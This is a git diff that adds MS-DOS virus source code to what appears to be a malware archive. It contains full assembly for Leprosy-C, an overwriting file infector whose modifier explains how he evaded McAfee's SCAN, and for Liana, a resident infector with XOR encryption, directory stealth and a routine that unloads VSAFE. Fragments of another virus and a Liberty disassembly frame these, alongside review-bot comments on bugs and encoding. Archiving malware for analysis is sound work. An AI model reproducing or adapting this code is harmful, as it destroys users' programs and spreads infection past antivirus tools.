+ je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... + mov es,ax ; ...to the ES register + cld + repe cmpsb ; Compare the buffer to the virus + jne healthy ; If different, the file is healthy! + call close_file ; Close it up otherwise + inc files_found ; Chalk up another fucked up file +continue_search: + mov ah,4fh ; Find next DOS function + int 21h ; Try to find another same type file + cmp ax,12h ; Are there any more files? 
+ je no_more_found ; If not, get outta here
+ jmp find_healthy ; If so, try the process on this one!
+no_more_found:
+ ret ; Go back to where we came from
+healthy:
+ mov bx,handle ; Get the file handle
+ mov ah,3eh ; Close it for now
+ int 21h
+ mov ah,3dh ; Open it again, to reset it
+ mov dx,dta+filename
+ mov al,2
+ int 21h
+ mov handle,ax ; Save the handle again
+ call infect_file ; Infect the healthy file
+ call close_file ; Close down this operation
+ inc success ; Indicate we did something this time
+ dec files_infected ; Scratch off another file on agenda
+ jz exit_virus ; If we're through, terminate
+ jmp continue_search ; Otherwise, try another
+ ret
+close_file:
+ mov bx,handle ; Get the file handle off the stack
+ mov cx,orig_time ; Get the date stamp
+ mov dx,orig_date ; Get the time stamp
+ mov al,1 ; Set file date/time sub-service
+ mov ah,57h ; Get/Set file date and time service
+ int 21h ; Call DOS
+ mov bx,handle
+ mov ah,3eh ; Close handle DOS service
+ int 21h
+ mov cx,orig_attr ; Get the file's original attribute
+ mov al,1 ; Instruct DOS to put it back there
+ mov dx,dta+filename ; Feed it the filename
+ mov ah,43h ; Call DOS
+ int 21h
+ ret
+exit_virus:
+ cmp files_found,6 ; Are at least 6 files infected?
+ jl print_fake ; If not, keep a low profile
+ cmp success,0 ; Did we infect anything?
+ jg print_fake ; If so, cover it up
+ mov ah,09h ; Use DOS print string service
+ mov dx,offset virus_msg1 ; Load the address of the first line
+ int 21h ; Print it
+ mov dx,offset virus_msg2 ; Load the second line
+ int 21h ; (etc)
+ mov dx,offset virus_msg3
+ int 21h
+ mov dx,offset virus_msg4
+ int 21h
+ jmp terminate
+print_fake:
+ mov ah,09h ; Use DOS to print fake error message
+ mov dx,offset fake_msg
+ int 21h
+terminate:
+ mov ah,4ch ; DOS terminate process function
+ int 21h ; Call DOS to get out of this program
+
+filler db 8 dup (90h) ; Pad out the file length to 666 bytes
+
+main endp
+code ends
+ end main
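Review bot: The two register-load comments in `close_file` are swapped — `mov cx,orig_time ; Get the date stamp` and `mov dx,orig_date ; Get the time stamp` — while INT 21h/57h with AL=1 takes the time in CX and the date in DX, which is exactly what the variable names say; they should read `; CX = original time` and `; DX = original date`. More important for anyone deriving a decryptor or signature from this source: `encrypt_decrypt` loops while `bx <= offset virus_code+virus_size` (`jle`), so it XORs virus_size+1 bytes starting at `virus_code`, which runs past the end of the 666-byte image that `infect_file` writes from `code_start` by the length of the clear-text header, not merely to the end of the file. That overrun only touches the program's own segment in memory, but the `; Are we at the end?` comment hides it and should say `; covers virus_size+1 bytes from virus_code, i.e. past code_start+virus_size`. Note also that `healthy:` reopens the victim and `infect_file` writes from offset 0 with no seek and no truncate, so a host larger than 666 bytes keeps its old tail as dead bytes and an .EXE loses its MZ header — an overwriting infector with no host recovery, which is what the file's warning header refers to and is worth stating next to `infect_file`.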
diff --git a/MSDOS/Virus.MSDOS.Unknown.leprosyc.asm b/MSDOS/Virus.MSDOS.Unknown.leprosyc.asm
new file mode 100644
index 00000000..f23db2a8
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.leprosyc.asm
@@ -0,0 +1,297 @@ +; - Leprosy-B Virus Source +; Copy-ya-right (c) 1990 by PCM2. +; +; This file is the source code to the Leprosy-B virus. It should +; be assembled with an MASM-compatible assembler; it has been tested +; and assembles correctly with both MASM 4.0 and Turbo Assembler 1.0. +; It should be made into a .COM file before executing, with either +; the "/t" command line flag in TLINK or Microsoft's EXE2BIN utility. +; +; This program has the potential to permanently destroy executable +; images on any disk medium. Other modifications may have been made +; subsequent to the original release by the author, either benign, +; or which could result in further harm should this program be run. +; In any case, the author assumes no responsibility for any damage +; caused by this program, incidental or otherwise. As a precaution, +; this program should not be turned over to irresponsible hands... +; (unlike people like us, that is). +; +;;-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=- +;; +;; - This virus is not really Leprosy-B. It is, in +;; fact, ALMOST the same. When I encountered the +;; source code and assembled it, I found, obviously +;; to my disappointment, that SCAN v77 could find +;; it. Since it is a self-encrypting virus, I knew +;; EXACTLY how to fix this problem (after all, +;; being part of McPhee's programs is a sure way to +;; know that your virus has been a big hit, but it +;; also means that it will soon meet a terrible end. +;; Presented with such a sad situation, I decided I +;; would modify the virus to give it one more shot +;; at the outside world. Not only that, but I will +;; make TWO new versions. This one, in particular, +;; will preserve the traditional length of 666, and +;; will only have a slight modification. You see, +;; since the virus encrypts itself, McPhee must go +;; on 1 or both of two paths. 
He must either use +;; the whole non-encrypted portion as an ID string, +;; or he must use the file offset where the value +;; for decrypting is normally stored, XOR it with +;; the rest of the program (this is how it encrypts +;; and decrypts itself), and then try to identify +;; the decrypted code as the virus. By changing +;; where the encryption value is stored in the non- +;; encrypted portion and putting a zero there in- +;; stead, (along with altering the primary instruc- +;; tions slightly), I have made it undetectable by +;; SCAN, despite the fact that it is (in all other +;; aspects) the same damn thing. +;; Have fun! +;; The BOOT SECTOR Infector... +;; +;; NOTE: Also, (in case you haven't already noticed) all of the changes +;; I make to this program will have a double semicolon (;;) on +;; them somewhere. This is to reinforce the fact that I DID +;; NOT do the original work on this virus. That credit is left +;; appropriately to PCM2. And I respect his brilliance in its +;; coding (especially the encrypt/decrypt portion!) +;; L8r peepz! +;; + + + + title "Leprosy-C Virus by PCM2, August 1990" +;; With additional modifications by TBSI, June 1991 + + +cr equ 13 ; Carriage return ASCII code +lf equ 10 ; Linefeed ASCII code +tab equ 9 ; Tab ASCII code +virus_size equ 666 ; Size of the virus file +code_start equ 100h ; Address right after PSP in memory +dta equ 80h ; Addr of default disk transfer area +datestamp equ 24 ; Offset in DTA of file's date stamp +timestamp equ 22 ; Offset in DTA of file's time stamp +filename equ 30 ; Offset in DTA of ASCIIZ filename +attribute equ 21 ; Offset in DTA of file attribute + + + code segment 'code' ; Open code segment + assume cs:code,ds:code ; One segment for both code & data + org code_start ; Start code image after PSP + +;--------------------------------------------------------------------- +; All executable code is contained in boundaries of procedure "main". 
+; The following code, until the start of "virus_code", is the non- +; encrypted CMT portion of the code to load up the real program. +;--------------------------------------------------------------------- +main proc near ; Code execution begins here + call encrypt_decrypt ; Decrypt the real virus code + jmp random_mutation ; Put the virus into action + db 0 ;; This line inserted by TBSI. If + ;; McPhee uses the second technique + ;; described in my speech, then it + ;; will find the zero and consider + ;; it to be the value it wants, even + ;; though using a zero will make it + ;; do absolutely NOTHING! +encrypt_val db 00h ; Hold value to encrypt by here + +; ---------- Encrypt, save, and restore the virus code ----------- +infect_file: + mov bx,handle ; Get the handle + push bx ; Save it on the stack + call encrypt_decrypt ; Encrypt most of the code + pop bx ; Get back the handle + nop ;; Added by TBSI to through of McPhee + mov cx,virus_size ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + call encrypt_decrypt ; Restore the code as it was + ret ; Go back to where you came from + +; --------------- Encrypt or decrypt the virus code ---------------- +encrypt_decrypt: + mov bx,offset virus_code ; Get address to start encrypt/decrypt +xor_loop: ; Start cycle here + mov ah,[bx] ; Get the current byte + xor ah,encrypt_val ; Engage/disengage XOR scheme on it + mov [bx],ah ; Put it back where we got it + inc bx ; Move BX ahead a byte + nop ;; Added by TBSI to through of McPhee + cmp bx,offset virus_code+virus_size ; Are we at the end? + jle xor_loop ; If not, do another cycle + ret ; and go back where we came from + +;----------------------------------------------------------------------- +; The rest of the code from here on remains encrypted until run-time, +; using a fundamental XOR technique that changes via CMT. 
+;----------------------------------------------------------------------- +virus_code: + +;---------------------------------------------------------------------------- +; All strings are kept here in the file, and automatically encrypted. +; Please don't be a lamer and change the strings and say you wrote a virus. +; Because of Cybernetic Mutation Technology(tm), the CRC of this file often +; changes, even when the strings stay the same. +;---------------------------------------------------------------------------- +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Program too big to fit in memory$" +virus_msg1 db cr,lf,tab,"ATTENTION! Your computer has been afflicted with$" +virus_msg2 db cr,lf,tab,"the incurable decay that is the fate wrought by$" +virus_msg3 db cr,lf,tab,"Leprosy Strain B, a virus employing Cybernetic$" +virus_msg4 db cr,lf,tab,"Mutation Technology(tm) and invented by PCM2 08/90.$" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? + +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. + cmp dh,15 ; Is it less than 16 seconds? + jg find_extension ; If not, don't mutate this time +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. + mov encrypt_val,dl ; Otherwise, save the new value +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,4 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? 
+ je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... 
+ mov es,ax ; ...to the ES register
+ cld
+ repe cmpsb ; Compare the buffer to the virus
+ jne healthy ; If different, the file is healthy!
+ call close_file ; Close it up otherwise
+ inc files_found ; Chalk up another fucked up file
+continue_search:
+ mov ah,4fh ; Find next DOS function
+ int 21h ; Try to find another same type file
+ cmp ax,12h ; Are there any more files?
+ je no_more_found ; If not, get outta here
+ jmp find_healthy ; If so, try the process on this one!
+no_more_found:
+ ret ; Go back to where we came from
+healthy:
+ mov bx,handle ; Get the file handle
+ mov ah,3eh ; Close it for now
+ int 21h
+ mov ah,3dh ; Open it again, to reset it
+ mov dx,dta+filename
+ mov al,2
+ int 21h
+ mov handle,ax ; Save the handle again
+ call infect_file ; Infect the healthy file
+ call close_file ; Close down this operation
+ inc success ; Indicate we did something this time
+ dec files_infected ; Scratch off another file on agenda
+ jz exit_virus ; If we're through, terminate
+ jmp continue_search ; Otherwise, try another
+ ret
+close_file:
+ mov bx,handle ; Get the file handle off the stack
+ mov cx,orig_time ; Get the date stamp
+ mov dx,orig_date ; Get the time stamp
+ mov al,1 ; Set file date/time sub-service
+ mov ah,57h ; Get/Set file date and time service
+ int 21h ; Call DOS
+ mov bx,handle
+ mov ah,3eh ; Close handle DOS service
+ int 21h
+ mov cx,orig_attr ; Get the file's original attribute
+ mov al,1 ; Instruct DOS to put it back there
+ mov dx,dta+filename ; Feed it the filename
+ mov ah,43h ; Call DOS
+ int 21h
+ ret
+exit_virus:
+ cmp files_found,6 ; Are at least 6 files infected?
+ jl print_fake ; If not, keep a low profile
+ cmp success,0 ; Did we infect anything?
+ jg print_fake ; If so, cover it up
+ mov ah,09h ; Use DOS print string service
+ mov dx,offset virus_msg1 ; Load the address of the first line
+ int 21h ; Print it
+ mov dx,offset virus_msg2 ; Load the second line
+ int 21h ; (etc)
+ mov dx,offset virus_msg3
+ int 21h
+ mov dx,offset virus_msg4
+ int 21h
+ jmp terminate
+print_fake:
+ mov ah,09h ; Use DOS to print fake error message
+ mov dx,offset fake_msg
+ int 21h
+terminate:
+ mov ah,4ch ; DOS terminate process function
+ int 21h ; Call DOS to get out of this program
+
+filler db 8 dup (90h) ; Pad out the file length to 666 bytes
+
+main endp
+code ends
+ end main
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.liana.asm b/MSDOS/Virus.MSDOS.Unknown.liana.asm
new file mode 100644
index 00000000..29fe1751
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.liana.asm
@@ -0,0 +1,473 @@
+;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
+;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
+;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
+;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
+;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
+;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
+;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
+; Liana Virus, created by Gehenna on 20 May 96!
+
+.286
+code segment
+assume cs:code,ds:code
+org 100h
+
+start: CALL NEXT
+
+NEXT:
+ mov di,sp ;take the stack pointer location
+ mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
+ sub bp,offset next ;subtract the large code off this code
+ ;
+;*******************************************************************
+; #1 DECRYPT ROUTINE
+;*******************************************************************
+
+cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
+je crypt2 ;yes! not decrypt
+;----------------------------------------------------------
+mov cx,offset fin ;cx = large of virus
+lea di,[offset crypt]+ bp ;di = first byte to decrypt
+mov dx,1 ;dx = value for decrypt
+;----------------------------------------------------------
+deci: ;deci = fuck label!
+;----------------------------------------------------------
+
+ÿsub byte ptr [di],07ch
+not byte ptr [di]
+xor word ptr [di],03c11h
+xor byte ptr [di],069h
+xor byte ptr [di],0ch
+xor byte ptr [di],0a2h
+not word ptr [di]
+add word ptr [di],05875h
+inc word ptr [di]
+add byte ptr [di],049h
+add word ptr [di],0ecb8h
+xor byte ptr [di],0f8h
+add byte ptr [di],083h
+not word ptr [di]
+add byte ptr [di],02h
+ÿinc di
+inc di
+;----------------------------------------------------------
+jmp bye ;######## BYE BYE F-PROT ! ##########
+mov ah,4ch
+int 21h
+bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
+;-----------------------------------------------------------
+mov ah,0bh ;######### BYE BYE TBAV ! 
##########
+int 21h ;### (CANGE INT AT YOU PLEASURE) ###
+;----------------------------------------------------------
+loop deci ;repeat please!
+ ;
+;*****************************************************************
+; #2 DECRYPT ROUTINE
+;*****************************************************************
+ ;
+crypt: ;fuck label!
+ ;
+mov cx,offset fin ;cx = large of virus
+lea di,[offset crypt2] + bp ;di = first byte to decrypt
+;---------------------------------------------------------------
+deci2: ;
+xor byte ptr cs:[di],1 ;decrytion rutine
+inc di ;very simple...
+loop deci2 ;
+;---------------------------------------------------------------
+crypt2: ;fuck label!
+ ;
+MOV AX,0CACAH ;call to my resident interrup mask
+INT 21H ;for chek "I'm is residet?"
+CMP Bh,0CAH ;is equal to CACA?
+JE PUM2 ;yes! jump to runnig program
+call action
+;*****************************************************************
+; NRLG FUNCTIONS (SELECTABLE)
+;*****************************************************************
+
+ÿcall ANTI_V
+;****************************************************************
+; PROCESS TO REMAIN RESIDENT
+;****************************************************************
+
+mov ax,3521h
+int 21h ;store the int 21 vectors
+mov word ptr [bp+int21],bx ;in cs:int21
+mov word ptr [bp+int21+2],es ;
+;---------------------------------------------------------------
+push cs ;
+pop ax ;ax = my actual segment
+dec ax ;dec my segment for look my MCB
+mov es,ax ;
+mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
+;---------------------------------------------------------------
+push cs ;
+pop es ;
+sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
+sub bx,17 + offset fin ;and 100H for the PSP total
+mov ah,4ah ;used memory
+int 21h ;put the new value to MCB
+;---------------------------------------------------------------
+mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
+mov ah,48h ;
+int 21h ;request the memory to fuck 
DOS!
+;---------------------------------------------------------------
+dec ax ;ax=new segment
+mov es,ax ;ax-1= new segment MCB
+mov byte ptr es:[1],8 ;put '8' in the segment
+;--------------------------------------------------------------
+inc ax ;
+mov es,ax ;es = new segment
+lea si,[bp + offset start] ;si = start of virus
+mov di,100h ;di = 100H (psp position)
+mov cx,offset fin - start ;cx = lag of virus
+push cs ;
+pop ds ;ds = cs
+cld ;mov the code
+rep movsb ;ds:si >> es:di
+;--------------------------------------------------------------
+mov dx,offset virus ;dx = new int21 handler
+mov ax,2521h ;
+push es ;
+pop ds ;
+int 21h ;set the vectors
+;-------------------------------------------------------------
+pum2: ;
+ ;
+mov ah,byte ptr [cs:bp + real] ;restore the 3
+mov byte ptr cs:[100h],ah ;first bytes
+mov ax,word ptr [cs:bp + real + 1] ;
+mov word ptr cs:[101h],ax ;
+;-------------------------------------------------------------
+mov ax,100h ;
+jmp ax ;jmp to execute
+ ;
+;*****************************************************************
+;* HANDLER FOR THE INT 21H
+;*****************************************************************
+ ;
+VIRUS: ;
+ ;
+cmp ah,4bh ;is a 4b function?
+je REPRODUCCION ;yes! jump to reproduce !
+cmp ah,11h
+je dir
+cmp ah,12h
+je dir
+dirsal:
+cmp AX,0CACAH ;is ... a caca function? (resident chek)
+jne a3 ;no! jump to a3
+mov bh,0cah ;yes! put ca in bh
+a3: ;
+JMP dword ptr CS:[INT21] ;jmp to original int 21h
+ret ;
+make db 'N.R.L.G. 
by Gehenna'
+dir:
+jmp dir_s
+;-------------------------------------------------------------
+REPRODUCCION: ;
+ ;
+pushf ;put the register
+pusha ;in the stack
+push si ;
+push di ;
+push bp ;
+push es ;
+push ds ;
+;-------------------------------------------------------------
+push cs ;
+pop ds ;
+mov ax,3524H ;get the dos error control
+int 21h ;interupt
+mov word ptr error,es ;and put in cs:error
+mov word ptr error+2,bx ;
+mov ax,2524H ;change the dos error control
+mov dx,offset all ;for my "trap mask"
+int 21h ;
+;-------------------------------------------------------------
+pop ds ;
+pop es ;restore the registers
+pop bp ;
+pop di ;
+pop si ;
+popa ;
+popf ;
+;-------------------------------------------------------------
+pushf ;put the registers
+pusha ;
+push si ;HEY! AZRAEL IS CRAZY?
+push di ;PUSH, POP, PUSH, POP
+push bp ;PLEEEEEAAAAAASEEEEEEEEE
+push es ;PURIFY THIS SHIT!
+push ds ;
+;-------------------------------------------------------------
+mov ax,4300h ;
+int 21h ;get the file
+mov word ptr cs:[attrib],cx ;atributes
+;-------------------------------------------------------------
+mov ax,4301h ;le saco los atributos al
+xor cx,cx ;file
+int 21h ;
+;-------------------------------------------------------------
+mov ax,3d02h ;open the file
+int 21h ;for read/write
+mov bx,ax ;bx=handle
+;-------------------------------------------------------------
+mov ax,5700h ;
+int 21h ;get the file date
+mov word ptr cs:[hora],cx ;put the hour
+mov word ptr cs:[dia],dx ;put the day
+and cx,word ptr cs:[fecha] ;calculate the seconds
+cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
+jne seguir ;yes! the file is infected!
+jmp cerrar ;
+;------------------------------------------------------------
+seguir: ;
+mov ax,4202h ;move the pointer to end
+call movedor ;of the file
+;------------------------------------------------------------
+push cs ;
+pop ds ;
+sub ax,3 ;calculate the
+mov word ptr [cs:largo],ax ;jmp long
+;-------------------------------------------------------------
+mov ax,04200h ;move the pointer to
+call movedor ;start of file
+;----------------------------------------------------------
+push cs ;
+pop ds ;read the 3 first bytes
+mov ah,3fh ;
+mov cx,3 ;
+lea dx,[cs:real] ;put the bytes in cs:[real]
+int 21h ;
+;----------------------------------------------------------
+cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
+jne er1 ;yes! is a EXE... fuckkk!
+;----------------------------------------------------------
+jmp cerrar
+er1:
+;----------------------------------------------------------
+mov ax,4200h ;move the pointer
+call movedor ;to start fo file
+;----------------------------------------------------------
+push cs ;
+pop ds ;
+mov ah,40h ;
+mov cx,1 ;write the JMP
+lea dx,[cs:jump] ;instruccion in the
+int 21h ;fist byte of the file
+;----------------------------------------------------------
+mov ah,40h ;write the value of jmp
+mov cx,2 ;in the file
+lea dx,[cs:largo] ;
+int 21h ;
+;----------------------------------------------------------
+mov ax,04202h ;move the pointer to
+call movedor ;end of file
+;----------------------------------------------------------
+push cs ;
+pop ds ;move the code
+push cs ;of my virus
+pop es ;to cs:end+50
+cld ;for encrypt
+mov si,100h ;
+mov di,offset fin + 50 ;
+mov cx,offset fin - 100h ;
+rep movsb ;
+;----------------------------------------------------------
+mov cx,offset fin
+mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
+enc: ;
+xor byte ptr cs:[di],1 ;encrypt the virus
+inc di ;code
+loop enc ;
+;---------------------------------------------------------
+mov cx,offset fin
+mov di,offset 
fin + 50 + (offset crypt - offset start) ;virus
+mov dx,1
+enc2: ;
+
+ÿsub byte ptr [di],02h
+not word ptr [di]
+sub byte ptr [di],083h
+xor byte ptr [di],0f8h
+sub word ptr [di],0ecb8h
+sub byte ptr [di],049h
+dec word ptr [di]
+sub word ptr [di],05875h
+not word ptr [di]
+xor byte ptr [di],0a2h
+xor byte ptr [di],0ch
+xor byte ptr [di],069h
+xor word ptr [di],03c11h
+not byte ptr [di]
+add byte ptr [di],07ch
+ÿinc di
+inc di ;the virus code
+loop enc2 ;
+;--------------------------------------------
+mov ah,40h ;
+mov cx,offset fin - offset start ;copy the virus
+mov dx,offset fin + 50 ;to end of file
+int 21h ;
+;----------------------------------------------------------
+cerrar: ;
+ ;restore the
+mov ax,5701h ;date and time
+mov cx,word ptr cs:[hora] ;file
+mov dx,word ptr cs:[dia] ;
+or cx,word ptr cs:[fecha] ;and mark the seconds
+int 21h ;
+;----------------------------------------------------------
+mov ah,3eh ;
+int 21h ;close the file
+;----------------------------------------------------------
+pop ds ;
+pop es ;restore the
+pop bp ;registers
+pop di ;
+pop si ;
+popa ;
+popf ;
+;----------------------------------------------------------
+pusha ;
+ ;
+mov ax,4301h ;restores the atributes
+mov cx,word ptr cs:[attrib] ;of the file
+int 21h ;
+ ;
+popa ;
+;----------------------------------------------------------
+pushf ;
+pusha ; 8-( = f-prot
+push si ;
+push di ; 8-( = tbav
+push bp ;
+push es ; 8-) = I'm
+push ds ;
+;----------------------------------------------------------
+mov ax,2524H ;
+lea bx,error ;restore the
+mov ds,bx ;errors handler
+lea bx,error+2 ;
+int 21h ;
+;----------------------------------------------------------
+pop ds ;
+pop es ;
+pop bp ;restore the
+pop di ;resgisters
+pop si ;
+popa ;
+popf ;
+;----------------------------------------------------------
+JMP A3 ;jmp to orig. 
INT 21
+ ;
+;**********************************************************
+; SUBRUTINES AREA
+;**********************************************************
+ ;
+movedor: ;
+ ;
+xor cx,cx ;use to move file pointer
+xor dx,dx ;
+int 21h ;
+ret ;
+;----------------------------------------------------------
+all: ;
+ ;
+XOR AL,AL ;use to set
+iret ;error flag
+
+;***********************************************************
+; DATA AREA
+;***********************************************************
+largo dw ?
+jump db 0e9h
+real db 0cdh,20h,0
+hora dw ?
+dia dw ?
+attrib dw ?
+int21 dd ?
+error dd ?
+
+ÿ;---------------------------------
+action: ;Call label
+MOV AH,2AH ;
+INT 21H ;get date
+CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
+JE cont ;nop! fuck ret
+cmp byte ptr cs:[action_dia+bp],32 ;
+jne no_day ;
+cont: ;
+cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
+je set ;
+cmp byte ptr cs:[action_mes+bp],13 ;
+jne NO_DAY ;nop! fuck ret
+set: ;
+mov AH,9 ;yeah!!
+MOV DX,OFFSET PAO ;print my text!
+INT 21H ;now!
+INT 20H ;an finsh te program
+NO_DAY: ;label to incorrect date
+ret ;return from call
+;---------------------------------
+
+ÿ
+PAO:
+DB 10,13,'Dedicated to Liana. 20 May 96','$'
+
+;---------------------------------
+ANTI_V: ;
+MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
+MOV DX,5945H ;
+INT 21H ;
+ret ;
+;---------------------------------
+
+ÿ;*****************************************************
+dir_s:
+ pushf
+ push cs
+ call a3 ;Get file Stats
+ test al,al ;Good FCB?
+ jnz no_good ;nope
+ push ax
+ push bx
+ push es
+ mov ah,51h ;Is this Undocmented? huh... 
+ int 21h
+ mov es,bx
+ cmp bx,es:[16h]
+ jnz not_infected
+ mov bx,dx
+ mov al,[bx]
+ push ax
+ mov ah,2fh ;Get file DTA
+ int 21h
+ pop ax
+ inc al
+ jnz fcb_okay
+ add bx,7h
+fcb_okay: mov ax,es:[bx+17h]
+ and ax,1fh ;UnMask Seconds Field
+ xor al,byte ptr cs:fechad
+ jnz not_infected
+ and byte ptr es:[bx+17h],0e0h
+ sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
+ sbb es:[bx+1fh],ax
+not_infected:pop es
+ pop bx
+ pop ax
+no_good: iret
+;********************************************************************
+; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
+;*********************************************************************
+
+ÿaction_dia Db 014H ;day for the action
+action_mes Db 05H ;month for the action
+FECHA DW 01eH ;Secon for mark
+FECHAd Db 01eH ;Secon for mark dir st
+fin:
+code ends
+end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.liberty2.asm b/MSDOS/Virus.MSDOS.Unknown.liberty2.asm
new file mode 100644
index 00000000..ad39d293
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.liberty2.asm
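Review bot: Several lines of this file carry a stray leading `ÿ` (0xFF) byte ahead of the source text, e.g. `+ÿsub byte ptr [di],07ch`, `+ÿcall ANTI_V`, `+ÿ;---------------------------------` and `+ÿaction_dia Db 014H`, and the banner block is CP437 box-drawing, so what is committed is not a clean text encoding of the collected original. For an archive whose value to analysts is provenance, the commit (or a sidecar README next to the MSDOS directory) should state the source encoding and whether those bytes are an upload artefact or were present in the copy that was collected; as it stands, anyone diffing this file against another repository's copy cannot tell transcription damage from genuine variation. A checksum of the original as received would serve the same purpose.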
@@ -0,0 +1,1194 @@
+CS:0110 EB79 JMP 018B
+CS:0112 90 NOP
+;
+; The program's original infomation is stored between these sections
+;
+CS:018B 2E CS:
+CS:018C 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ?
+CS:0191 7403 JZ 0196
+CS:0193 1F POP DS
+CS:0194 59 POP CX
+CS:0195 5B POP BX
+CS:0196 50 PUSH AX
+CS:0197 53 PUSH BX
+CS:0198 51 PUSH CX
+CS:0199 52 PUSH DX
+CS:019A 1E PUSH DS
+CS:019B 06 PUSH ES
+CS:019C 1E PUSH DS
+CS:019D 0E PUSH CS
+CS:019E 1F POP DS
+CS:019F E8CD00 CALL 026F ; Installation check
+CS:01A2 3DFFFF CMP AX,FFFF
+CS:01A5 741A JZ 01C1
